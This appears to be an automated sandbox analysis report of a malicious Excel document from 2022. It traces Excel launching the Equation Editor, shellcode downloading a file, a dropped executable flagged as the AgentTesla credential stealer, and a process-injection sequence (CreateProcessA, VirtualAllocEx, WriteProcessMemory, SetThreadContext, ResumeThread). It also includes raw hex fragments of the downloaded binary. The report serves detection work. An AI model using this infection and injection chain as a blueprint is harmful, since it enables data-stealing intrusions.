00 67 00 73 00 2e 00 52 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 00 00 00 4d cf 6a f0 6a dd 6a ee 6a f0 6a f1 6a ec 6a ca 6a
                                Data Ascii: rhTiSBWWToYDxFfEgkemuiSBWWToYDxFfEgkseRiSBWWToYDxFfEgkiSBWWToYDxFfEgk"{0}" MStartupNextInstanceEventArgs.ResourcesMjjjjjjjj
                                2022-08-05 09:41:36 UTC81INData Raw: 00 01 08 12 15 04 00 01 02 0e 06 00 03 0e 0e 0e 0e 0c 00 05 01 12 80 a9 08 12 80 a9 08 08 05 00 01 1d 05 08 06 00 01 01 12 80 9d 05 00 01 12 61 08 49 07 34 11 64 11 60 12 3c 12 40 0e 12 54 12 5c 02 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 12 44 12 38 0e 12 48 12 50 0e 12 58 12 4c 1d 08 08 1d 05 02 08 08 08 08 08 08 08 08 08 08 08 08 08 08 1d 05 12 80 9d 12 61 1d 0e 08 02 02 08 0b 10 01 01 1e 00 15 12 1d 01 1e 00 03 0a 01 0e 05 20 02 0e 0e 0e 04 00 01 0e 0e 05 07 03 0e 0e 0e 03 07 01 02 04 01 00 00 00 06 20 01 01 11 80 c1 06 20 01 01 11 80 c9 02 1e 24 06 20 01 01 11 80 d1 08 01 00 01 00 00 00 00 00 05 20 02 01 0e 0e 18 01 00 0a 4d 79 54 65 6d 70 6c 61 74 65 08 31 31 2e 30 2e 30 2e 30 00 00 06 15 12 18 01 12 0c 06 15 12 18 01 12 08 06 15 12 18 01 12 11 06 15 12 18 01
                                Data Ascii: aI4d`<@T\D8HPXLa $ MyTemplate11.0.0.0
                                2022-08-05 09:41:36 UTC85INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
                                2022-08-05 09:41:36 UTC89INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: ( @
                                2022-08-05 09:41:36 UTC93INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 01 00 06 00 10 10 10 00 01 00 04 00 28 01 00 00 02 00 10 10 00 00 01 00 08 00 68 05 00 00 03 00 10 10 00 00 01 00 20
                                Data Ascii: (h


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:11:41:32
                                Start date:05/08/2022
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x13f440000
                                File size:28253536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:2
                                Start time:11:41:53
                                Start date:05/08/2022
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                Imagebase:0x400000
                                File size:543304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Reputation:high

                                General

                                Target ID:5
                                Start time:11:42:00
                                Start date:05/08/2022
                                Path:C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                                Imagebase:0xff0000
                                File size:8704 bytes
                                MD5 hash:6D370555D43F89189867FD72222C6059
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                Reputation:low

                                General

                                Target ID:6
                                Start time:11:42:05
                                Start date:05/08/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
                                Imagebase:0x960000
                                File size:204800 bytes
                                MD5 hash:B3CC5F3514BF58EE55153795CF183754
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                Reputation:low

                                General

                                Target ID:7
                                Start time:11:42:07
                                Start date:05/08/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                Wow64 process (32bit):true
                                Commandline:dw20.exe -x -s 536
                                Imagebase:0x10000000
                                File size:33936 bytes
                                MD5 hash:FBA78261A16C65FA44145613E3669E6E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:48.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:100%
                                  Total number of Nodes:42
                                  Total number of Limit Nodes:2
                                  execution_graph 187 38a8b6f LoadLibraryW 195 38a8b97 187->195 189 38a8b84 190 38a8bf9 URLDownloadToFileW 189->190 191 38a8bfc 7 API calls 189->191 192 38a8c17 6 API calls 190->192 194 38a8ba8 191->194 193 38a8c05 192->193 194->190 196 38a8b9a 195->196 198 38a8ba8 URLDownloadToFileW 196->198 214 38a8bfc URLDownloadToFileW 196->214 202 38a8c17 198->202 203 38a8c19 202->203 217 38a8c2d 203->217 205 38a8c93 ExitProcess 212 38a8c05 215 38a8c17 6 API calls 214->215 216 38a8c05 214->216 215->216 218 38a8c30 217->218 219 38a8c60 4 API calls 218->219 220 38a8c4e 219->220 221 38a8c70 2 API calls 220->221 222 38a8c67 221->222 223 38a8c1e 222->223 224 38a8c90 ExitProcess 222->224 223->205 227 38a8c60 LoadLibraryW 223->227 225 38a8c84 224->225 225->223 226 38a8c93 ExitProcess 225->226 228 38a8c67 227->228 229 38a8c70 2 API calls 227->229 230 38a8c90 ExitProcess 228->230 231 38a8c4e 228->231 229->228 232 38a8c84 230->232 234 38a8c70 231->234 232->231 233 38a8c93 ExitProcess 232->233 235 38a8c73 234->235 236 38a8c90 ExitProcess 235->236 237 38a8c84 236->237 238 38a8c67 237->238 239 38a8c93 ExitProcess 237->239 238->212 240 38a8c90 238->240 241 38a8c93 ExitProcess 240->241

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_036BB34E 1 Function_038A8B6F 3 Function_038A8BFC 1->3 10 Function_038A8C17 1->10 11 Function_038A8B97 1->11 2 Function_038A8CBF 3->10 4 Function_038A8C2D 5 Function_038A8C90 4->5 6 Function_038A8C60 4->6 7 Function_038A8C70 4->7 6->5 6->7 7->5 8 Function_038A8D10 9 Function_0370783C 10->4 10->5 10->6 10->7 11->3 11->10

                                  Executed Functions

                                  Function 038A8B6F Relevance: 3.1, APIs: 2, Instructions: 72libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryW.KERNEL32 ref: 038A8B7D
                                    • Part of subcall function 038A8B97: URLDownloadToFileW.URLMON(00000000,038A8BA8,?,00000000,00000000), ref: 038A8BFE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFileLibraryLoad
                                  • String ID:
                                  • API String ID: 2776762486-0
                                  • Opcode ID: a0c2422bab3c0bcf3a24ef7ab51da5e46b75dcac1cb7b0ea48e3c5fee6e75bae
                                  • Instruction ID: 63ae8ed5edc6fce024965280c58d35de04bea6e7bb2146ce5d431698dfdd02cc
                                  • Opcode Fuzzy Hash: a0c2422bab3c0bcf3a24ef7ab51da5e46b75dcac1cb7b0ea48e3c5fee6e75bae
                                  • Instruction Fuzzy Hash: 4D21159040DBC12FE716D7B84E7AA65BFA47E03204B0DCACFC4D58E4A3C394A646D766
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038A8C60 Relevance: 3.1, APIs: 2, Instructions: 51libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14 38a8c60 LoadLibraryW 15 38a8c67 14->15 16 38a8c62 call 38a8c70 14->16 17 38a8c69-38a8c87 call 38a8c90 15->17 18 38a8cdd-38a8cde 15->18 16->15 33 38a8cd9 17->33 34 38a8c89 17->34 19 38a8ce0-38a8ce5 18->19 20 38a8d56-38a8d78 18->20 21 38a8cfa-38a8cfc 19->21 22 38a8ce7-38a8ceb 19->22 26 38a8d0c-38a8d0d 21->26 22->21 25 38a8ced-38a8cf4 22->25 29 38a8cf8 25->29 30 38a8cf6 25->30 32 38a8cfe-38a8d07 29->32 30->21 36 38a8d09 32->36 37 38a8cd0-38a8cd3 32->37 38 38a8cdb-38a8cdf 33->38 39 38a8ce1-38a8ce5 33->39 34->21 40 38a8c8b-38a8c95 ExitProcess 34->40 36->26 37->32 41 38a8cd5 37->41 38->25 38->39 39->21 39->22 41->33
                                  APIs
                                  • LoadLibraryW.KERNEL32(038A8C4E), ref: 038A8C60
                                    • Part of subcall function 038A8C70: ExitProcess.KERNEL32(00000000,?,038A8C84), ref: 038A8C95
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitLibraryLoadProcess
                                  • String ID:
                                  • API String ID: 2206315515-0
                                  • Opcode ID: c075552f11b00380bb7d55ab29910a9d5bfb3ff50c054c1ee495d6d423b57776
                                  • Instruction ID: 4d044b256853e2a530e02eb0799e363fde336f9ee69dd4752762f1dde9a3ad1c
                                  • Opcode Fuzzy Hash: c075552f11b00380bb7d55ab29910a9d5bfb3ff50c054c1ee495d6d423b57776
                                  • Instruction Fuzzy Hash: E0014E39906F06E9F694FAEC84C8659FFD0FB91714F5885D3D501CA021D2609446DF3D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038A8C17 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 44 38a8c17-38a8c28 call 38a8c2d 49 38a8c2a-38a8c67 call 38a8c60 call 38a8c70 44->49 50 38a8c93-38a8c95 ExitProcess 44->50 58 38a8c69-38a8c7c 49->58 59 38a8cdd-38a8cde 49->59 65 38a8c7f-38a8c87 call 38a8c90 58->65 60 38a8ce0-38a8ce5 59->60 61 38a8d56-38a8d78 59->61 62 38a8cfa-38a8cfc 60->62 63 38a8ce7-38a8ceb 60->63 67 38a8d0c-38a8d0d 62->67 63->62 66 38a8ced-38a8cf4 63->66 74 38a8cd9 65->74 75 38a8c89 65->75 70 38a8cf8 66->70 71 38a8cf6 66->71 73 38a8cfe-38a8d07 70->73 71->62 77 38a8d09 73->77 78 38a8cd0-38a8cd3 73->78 79 38a8cdb-38a8cdf 74->79 80 38a8ce1-38a8ce5 74->80 75->62 81 38a8c8b-38a8c90 75->81 77->67 78->73 82 38a8cd5 78->82 79->66 79->80 80->62 80->63 81->50 82->74
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 1344612fcfac8767b13517417e7ca55d336cf204b69795767fdb169aa5e0abe5
                                  • Instruction ID: 6c320e5f8b08c0582feb1823baa53d5cd8b8d16d2e492facf12ddc866ee77038
                                  • Opcode Fuzzy Hash: 1344612fcfac8767b13517417e7ca55d336cf204b69795767fdb169aa5e0abe5
                                  • Instruction Fuzzy Hash: 2A11007480AB81AEF791FBFCC888B0ABFE5BF91200F1895D9D5408A152DA74D805DF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038A8B97 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 84 38a8b97-38a8ba2 86 38a8ba8-38a8c00 URLDownloadToFileW call 38a8c17 84->86 87 38a8ba3 call 38a8bfc 84->87 93 38a8c05-38a8c15 86->93 87->86
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFile
                                  • String ID:
                                  • API String ID: 1407266417-0
                                  • Opcode ID: 67d525d6f48ac61ec9b18bcd6d85f0bb95344e304786f316d0fdbacbce94af86
                                  • Instruction ID: ce8c5ea753948090233e6a9fb1d27d1c4cf32fa41443f09d22942e8f4d8a78c9
                                  • Opcode Fuzzy Hash: 67d525d6f48ac61ec9b18bcd6d85f0bb95344e304786f316d0fdbacbce94af86
                                  • Instruction Fuzzy Hash: 8811FE9090D7D15FD712C7B88D7AA50BFA42E03204B0DCACFC4C88F4A3D7A49142EB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038A8C70 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 96 38a8c70-38a8c87 call 38a8c90 102 38a8cd9 96->102 103 38a8c89 96->103 104 38a8cdb-38a8cdf 102->104 105 38a8ce1-38a8ce5 102->105 106 38a8cfa-38a8cfc 103->106 107 38a8c8b-38a8c95 ExitProcess 103->107 104->105 108 38a8ced-38a8cf4 104->108 105->106 110 38a8ce7-38a8ceb 105->110 111 38a8d0c-38a8d0d 106->111 112 38a8cf8 108->112 113 38a8cf6 108->113 110->106 110->108 115 38a8cfe-38a8d07 112->115 113->106 117 38a8d09 115->117 118 38a8cd0-38a8cd3 115->118 117->111 118->115 119 38a8cd5 118->119 119->102
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 9972dc509afebeb48d15e8a22faac023fdd527fc02b6dda4ce751b45f19a6b7f
                                  • Instruction ID: 5f693ae9856dfb97440d4891f037b389ae9d90971bed7260300deb5873c25953
                                  • Opcode Fuzzy Hash: 9972dc509afebeb48d15e8a22faac023fdd527fc02b6dda4ce751b45f19a6b7f
                                  • Instruction Fuzzy Hash: 12F0F959906B42A1F7B0F2EC44047A6EFD5AB51A04FCC88C79D82C4045D1A898C3CE3D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038A8C2D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 120 38a8c2d-38a8c67 call 38a8c60 call 38a8c70 129 38a8c69-38a8c87 call 38a8c90 120->129 130 38a8cdd-38a8cde 120->130 145 38a8cd9 129->145 146 38a8c89 129->146 131 38a8ce0-38a8ce5 130->131 132 38a8d56-38a8d78 130->132 133 38a8cfa-38a8cfc 131->133 134 38a8ce7-38a8ceb 131->134 138 38a8d0c-38a8d0d 133->138 134->133 137 38a8ced-38a8cf4 134->137 141 38a8cf8 137->141 142 38a8cf6 137->142 144 38a8cfe-38a8d07 141->144 142->133 148 38a8d09 144->148 149 38a8cd0-38a8cd3 144->149 150 38a8cdb-38a8cdf 145->150 151 38a8ce1-38a8ce5 145->151 146->133 152 38a8c8b-38a8c95 ExitProcess 146->152 148->138 149->144 153 38a8cd5 149->153 150->137 150->151 151->133 151->134 153->145
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitLibraryLoadProcess
                                  • String ID:
                                  • API String ID: 2206315515-0
                                  • Opcode ID: 540d9297a408a45d47faf81bfff063f1dffb4d0729a7aadb181138d36ca86638
                                  • Instruction ID: ee456af75d1de7824ea35aa932f2d53402cf85f2cb339392d00c0bceabfcec34
                                  • Opcode Fuzzy Hash: 540d9297a408a45d47faf81bfff063f1dffb4d0729a7aadb181138d36ca86638
                                  • Instruction Fuzzy Hash: D3F0A965C0EB806DF691E7FC888974ABFE4AF41600F0899CA8485CA051D6749405CF75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038A8C90 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 156 38a8c90-38a8c95 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(00000000,?,038A8C84), ref: 038A8C95
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                  • Instruction ID: 7509033ca948316697719d628b7034e54ea344d75a6a98c66cafd8fe3af7e7fc
                                  • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                  • Instruction Fuzzy Hash: C7D012712129019FE244DF58CD44F17F76AFFC4611F14C254E5058B655D730D991CAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038A8BFC Relevance: 1.5, APIs: 1, Instructions: 11filenetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 158 38a8bfc-38a8bfe URLDownloadToFileW 159 38a8c05-38a8c15 158->159 160 38a8c00 call 38a8c17 158->160 160->159
                                  APIs
                                  • URLDownloadToFileW.URLMON(00000000,038A8BA8,?,00000000,00000000), ref: 038A8BFE
                                    • Part of subcall function 038A8C17: ExitProcess.KERNEL32(00000000,?,038A8C84), ref: 038A8C95
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadExitFileProcess
                                  • String ID:
                                  • API String ID: 1989547487-0
                                  • Opcode ID: 0c5d10258b99953255b29f10826d1516c146f16d49d4bc6dfa2faddd692d9ee8
                                  • Instruction ID: 61e8eded15241aaa38997fb78bd732dccbc8f189403e4d3c2b3d72cfb885c17a
                                  • Opcode Fuzzy Hash: 0c5d10258b99953255b29f10826d1516c146f16d49d4bc6dfa2faddd692d9ee8
                                  • Instruction Fuzzy Hash: B8C0022055EBD00EE6A2E3F84969A257FE02F07704F0D58CAC0C48F1A3D6199556FB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:43.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:70%
                                  Total number of Nodes:30
                                  Total number of Limit Nodes:0
                                  execution_graph 2195 791f28 2196 791f4f 2195->2196 2199 7921e2 2196->2199 2200 7921f5 2199->2200 2221 797518 2200->2221 2201 7947e2 2216 797e58 VirtualAllocEx 2201->2216 2217 797e50 VirtualAllocEx 2201->2217 2202 7957a7 2208 797bfa WriteProcessMemory 2202->2208 2209 797c00 WriteProcessMemory 2202->2209 2203 796b90 2212 797bfa WriteProcessMemory 2203->2212 2213 797c00 WriteProcessMemory 2203->2213 2204 796e20 2205 7972b9 2204->2205 2214 7979a8 Wow64SetThreadContext 2204->2214 2215 7979a0 Wow64SetThreadContext 2204->2215 2219 797f78 ResumeThread 2205->2219 2220 797f71 ResumeThread 2205->2220 2206 795c5e 2206->2203 2210 797bfa WriteProcessMemory 2206->2210 2211 797c00 WriteProcessMemory 2206->2211 2207 791f71 2208->2206 2209->2206 2210->2206 2211->2206 2212->2204 2213->2204 2214->2205 2215->2205 2216->2202 2217->2202 2219->2207 2220->2207 2222 79759f CreateProcessA 2221->2222 2224 7977f4 2222->2224 2224->2224 2225 791f18 2226 791f28 2225->2226 2228 7921e2 9 API calls 2226->2228 2227 791f71 2228->2227

                                  Executed Functions

                                  Function 007921E2 Relevance: 12.2, Strings: 4, Instructions: 7237COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 7921e2-792489 2 79248b 0->2 3 792490-79463c 0->3 2->3 160 79463e 3->160 161 794643-794678 3->161 160->161 163 7946d9-794802 call 797518 161->163 164 79467a-7946d3 161->164 171 79482a-794a44 163->171 172 794804-79481f 163->172 164->163 182 794a4b-794bd9 171->182 183 794a46 171->183 172->171 192 794bdb 182->192 193 794be0-794cfe 182->193 183->182 192->193 198 794d00-794d37 193->198 199 794d63-794d9a 193->199 204 794d39-794d54 198->204 205 794d5f-794d61 198->205 202 794d9c-794db7 199->202 203 794dc2-794f00 199->203 202->203 213 794f02 203->213 214 794f07-795008 203->214 204->205 205->203 213->214 218 79500a 214->218 219 79500f-7951ac 214->219 218->219 224 7951ae-7951c9 219->224 225 7951d4-7951e1 219->225 224->225 226 7951e3-795204 225->226 227 795206-79520f 225->227 226->227 234 795214-7952d4 226->234 229 7952da-7952ef 227->229 230 7952f1-79530c 229->230 231 795317-795427 229->231 230->231 242 795429 231->242 243 79542e-795576 231->243 234->229 242->243 249 795578 243->249 250 79557d-7957a2 243->250 249->250 430 7957a5 call 797e58 250->430 431 7957a5 call 797e50 250->431 258 7957a7-7957bf 259 7957ca-7957d3 258->259 260 7957c1-7957c8 258->260 262 7958e6-7958fb 259->262 260->259 261 7957d8-7958e0 260->261 261->262 263 795901-795bed 262->263 264 795bf3-795c0e 262->264 263->264 266 795c10-795c2b 264->266 267 795c36-795c59 264->267 266->267 422 795c5c call 797bfa 267->422 423 795c5c call 797c00 267->423 271 795c5e-795c7e 272 795c80-795c9b 271->272 273 795ca6-795d6d 271->273 272->273 285 795d6f 273->285 286 795d74-795e19 273->286 285->286 294 795e1b 286->294 295 795e20-795f30 286->295 294->295 301 795f32 295->301 302 795f37-795f3c 295->302 301->302 303 795f3e 302->303 304 795f43-795f5e 302->304 303->304 305 796b72-796b8a 304->305 306 796b90-796ca4 305->306 307 795f63-7960ae 305->307 317 796cab-796e1b 306->317 318 796ca6 306->318 314 7960b0 307->314 315 7960b5-796195 307->315 314->315 326 79619c-796280 315->326 327 796197 315->327 426 796e1e call 797bfa 317->426 427 796e1e call 797c00 317->427 318->317 342 796282 326->342 343 796287-7962be 326->343 327->326 328 796e20-796e40 330 796e68-796fb8 328->330 331 796e42-796e5d 328->331 340 796fba 330->340 341 796fbf-796fef 330->341 331->330 340->341 346 796ffd-79711c 341->346 347 796ff1-796ff7 341->347 342->343 348 7962c4-79644e 343->348 349 7968e6-796a0d 343->349 359 79711e 346->359 360 797123-797138 346->360 347->346 361 796450 348->361 362 796455-796591 348->362 363 796a0f 349->363 364 796a14-796b65 349->364 359->360 365 79713a 360->365 366 79713f-79729d 360->366 361->362 375 796598-7966f8 362->375 376 796593 362->376 363->364 378 796b6c 364->378 379 796b67 364->379 365->366 382 79729f-7972b4 366->382 383 797305-79733f 366->383 392 7966fa 375->392 393 7966ff-79681f 375->393 376->375 378->305 379->378 428 7972b7 call 7979a8 382->428 429 7972b7 call 7979a0 382->429 387 797341-79735c 383->387 388 797367-797374 383->388 386 7972b9-7972d9 390 7972db-7972f6 386->390 391 797301-797303 386->391 387->388 433 797377 call 797f78 388->433 434 797377 call 797f71 388->434 390->391 391->388 392->393 408 796821 393->408 409 796826-79686e 393->409 395 797379-797399 397 79739b-7973b6 395->397 398 7973c1-7974fc 395->398 397->398 408->409 415 796870 409->415 416 796875-796898 409->416 415->416 424 79689b call 797bfa 416->424 425 79689b call 797c00 416->425 417 79689d-7968bd 418 7968bf-7968da 417->418 419 7968e5 417->419 418->419 419->349 422->271 423->271 424->417 425->417 426->328 427->328 428->386 429->386 430->258 431->258 433->395 